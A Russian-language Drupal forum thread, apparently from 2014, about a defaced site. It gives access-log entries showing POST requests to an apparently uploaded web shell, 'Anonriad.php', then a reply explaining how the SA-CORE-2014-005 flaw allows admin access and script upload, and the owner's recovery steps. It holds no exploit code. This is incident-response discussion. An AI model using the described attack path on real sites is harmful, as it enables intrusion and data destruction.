[10:21:15] "GET /sites/default/files/slides/slide1_0.jpg HTTP/1.0" 200 69377 "http://site.ru/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:21:15] "GET /sites/default/files/777rcing.jpg HTTP/1.0" 200 3898 "http://site.ru/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:21:18] "POST /Anonriad.php HTTP/1.0" 200 3132 "http://site.ru/Anonriad.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:21:27] "POST /Anonriad.php HTTP/1.0" 200 4449 "http://site.ru/Anonriad.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:21:28] "GET / HTTP/1.0" 200 1632 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"

Вложение	Размер
supit-hacked.png	1.36 МБ

По этой уязвимости https://www.drupal.org/SA-CORE-2014-005 можно получить доступ к админке. Админ может (через файловый браузер) закачать на серв любой скрипт и запустить его, который может выполнять что угодно, в том числе и удаление всех файлов сайта и создание индекса в корне, который вы сейчас видите. Вообще-то вариантов много. У кого какая фантазия.

SergeyB 22 декабря 2014 в 21:07

спасибо
восстановил сайт и бэкапа, обновил ядро, обновил модули

mbaev 22 декабря 2014 в 22:38

Советую и пароли сменить, включая пароль к базе.

SergeyB 23 декабря 2014 в 10:50

Само собой, сразу сменил пароли админа и к базе!

Drupal Drupal на русском

Поламали сайт HACKED BY ARAB WARRIORS TEAM

Главные вкладки

Комментарии